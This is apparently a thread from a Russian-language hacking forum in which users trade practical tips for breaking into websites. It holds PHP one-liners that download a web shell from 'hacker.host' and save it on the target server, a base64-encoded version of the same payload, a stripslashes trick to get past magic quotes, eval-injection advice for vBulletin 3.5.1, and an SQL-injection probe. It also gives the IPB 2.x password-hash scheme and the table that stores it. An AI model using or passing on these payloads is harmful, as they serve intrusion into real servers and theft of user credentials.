Ваши вопросы по уязвимостям.

include()

ps
9000 пост

 

там блин такая булка, что авы выводяться вот типа так

Code:

http://ыыыы/image.php?u=124124&dateline=124124124

+ я думую что они проверяются там на пхп код.

И удалённый инклуд запрещён.а юзать логи както извратно в данном случае..

ЗЫ есть досутуп в админку, но както не получеться там uploder сделать =(

 

Ну удалённый то понятно.
А вот как ты хотел то?
Инклюд логами делай.

 

зделать какуюнибудь качалку на пхп, аля :

Code:

<? $data = implode('',file('http://127.0.0.1/shell.txt')); $fp=fopen('./123.php','wb'); fputs($fp,$data); fclose($fp); ?>

 

Лей шелл вот так:

Code:

<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>

либо, если экранируются кавычки:

Code:

<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>

 

shell_exec, popen, pcntl_exec.

Кроме wget есть еще links, lynx, curl, GET, fetch

 

Спасибо, люди!
Отдельное спасибо InFlame, за stripslashes(), я просто не как не мог допереть как обойти ковычки.

 

Сам хз

Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке

Code:

ID=1322879'

выводит

Сам хз

Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке

Code:

ID=1322879'

выводит

Code:

Server Error in '/' Application.
Input string was not in a correct format. 
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. 

Exception Details: System.FormatException: Input string was not in a correct format.

Source Error: 

Line 139:        forumid = CLng(SafeHTML(Request.QueryString("forumid")))
Line 140:        If mode = "edit" Then 
Line 141:            forumid = GetSingleValueViaRS("SELECT forumid from pgd_messages with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text, 0)
Line 142:            arrTheArray = GetArrayViaRS("SELECT upfile,upfilesize from pgd_upfile with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text)
Line 143:            If IsArray(arrTheArray) Then 


Source File: не скажу :)   Line: 141 

Stack Trace: 

[FormatException: Input string was not in a correct format.]
   Microsoft.VisualBasic.CompilerServices.Conversions.ParseDecimal(String Value, NumberFormatInfo NumberFormat) +718618
   Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +178

[InvalidCastException: Conversion from string "1322879'" to type 'Long' is not valid.]
   Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +714736
   ASP.upload_aspx.__Render__control1(HtmlTextWriter __w, Control parameterContainer) in не скажу :):141
   System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +115
   System.Web.UI.Page.Render(HtmlTextWriter writer) +38
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +4240


Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082

 

вопрос такой, есть шелл (апач),так же есть файлы с правами 777 которые я могу шеллом редактить,у этих файлов владелец (вебмастер),можно за счет этого повысить права у шелла до вебмастера?вопрос навено глуповат, тут где то писалось об этом, и однозначного ответа там не прозвучало.
спасибо

 

milw0rm.com в помощь

 

Плиз, дайте чёткие указание как залить шелл в vbulitin 3.5.1, я писал код в модулях,
местоположение faq_comlete, код например

при заходе на faq.php? выскакивали "ошибки содержимого", шелл не залился. Но когда вписал

то заработало faq?e=phpinfo();

Дайте пожалуйста чёткие указания, какой код вписать в faq.?e=

 

Code:

e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');

 

там магические кавычки в ON

 

eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));

 

Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)

Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?

 

вопрос был про повышение прав до пользователя,а не до рута,используя сплоиты с milw0rm.com.
или я не то понял

 

А root не пользователь? И поимев рута у тебя есть большая вероятность поиметь обычного пользователя.

ЗЫ: и експлоиты не обязательно повышают права до рута...

 

Как можно залить в IPB шелл и где в БД храняться хэши паролей?

PS есть доступ на чтение БД
Версия форума 2.3.6

 

1) IPB 2.x.x - md5(md5($salt).md5($pass)), префикс - whb_, таблица - members_converge, salt - 5 символов

2) https://forum.antichat.ru/threadedpost1095553.html

 

Директива magic_quotes_gpc действует ТОЛЬКО на значения Get, Post и Cookie.